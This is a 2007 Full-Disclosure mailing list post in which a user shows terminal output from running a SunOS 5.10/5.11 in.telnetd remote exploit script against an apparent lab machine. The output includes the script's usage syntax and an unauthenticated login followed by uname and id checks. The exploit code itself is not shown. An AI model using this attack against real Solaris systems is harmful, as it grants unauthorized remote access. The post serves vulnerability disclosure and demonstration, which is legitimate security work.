[Full-disclosure] "0day was the case that they gave me"

Andrea Purificato - bunker bunker at fastwebnet.it
Sun Feb 11 10:15:21 GMT 2007


Alle 07:00, domenica 11 febbraio 2007, Tyop? ha scritto:

> Ok. Someone have a Sol10?

(11:10) bunker at syn:~$ sh test.sh

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope at gmx.net
 ./sunos <host> <account>
 ./sunos localhost bin

(11:11) bunker at syn:~$ sh test.sh sparclab bunker

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope at gmx.net

 ALEX ALEX

 Trying 23.255.212.138...
 Connected to sparclab.
 Escape character is '^]'.
 Last login: Sun Feb 11 11:08:21 from syn
 Sun Microsystems Inc.   SunOS 5.11      snv_49  October 2007

(11:09) bunker at sparclab:~$ uname -a; id;
 SunOS sparclab 5.11 snv_49 sun4u sparc SUNW,Ultra-5_10
 uid=100(bunker) gid=1(other)

(11:09) bunker at sparclab:~$ exit
 logout
 Connection closed by foreign host.




Absolutely disarming!
-- 
Andrea "bunker" Purificato
+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.

http://rawlab.mindcreations.com 




Full-Disclosure is hosted and sponsored by Secunia.